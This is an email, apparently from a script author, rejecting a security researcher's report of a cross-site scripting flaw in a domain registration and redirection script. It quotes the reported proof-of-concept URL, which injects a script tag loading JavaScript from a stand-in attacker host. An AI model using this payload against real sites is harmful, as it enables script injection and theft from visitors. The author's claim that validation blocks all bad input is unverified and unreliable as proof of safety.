Hello,

I never read anything else from you. I checked the points you told me (bug in milliscripts redirection when checking $domainname for example), but they are not true.

In /include/functions.php, *every* input is checked for validation. The functions are called:

    check_domain($dname)
    check_domain2($dname, $extension)
    check_string($string)
    verify_email($email)
    check_forbidden($url1)

No invalid input can reach the script, there is no possibility that a URL like this causes any problem or security issue:

    http://www.server.net/red_14/register.php?do=register2&domainname=%22%3E%3Cscript%20src=http://serveratacker.com/script.js%3E%3C/script%3E&ext=somevaliddomain.net

Please test all scripts in context with the included files, like functions.php. I don't know how exactly you test, but there can never be any problems like you told them. Please revise your security issue which never has been any.

Best regards
Alex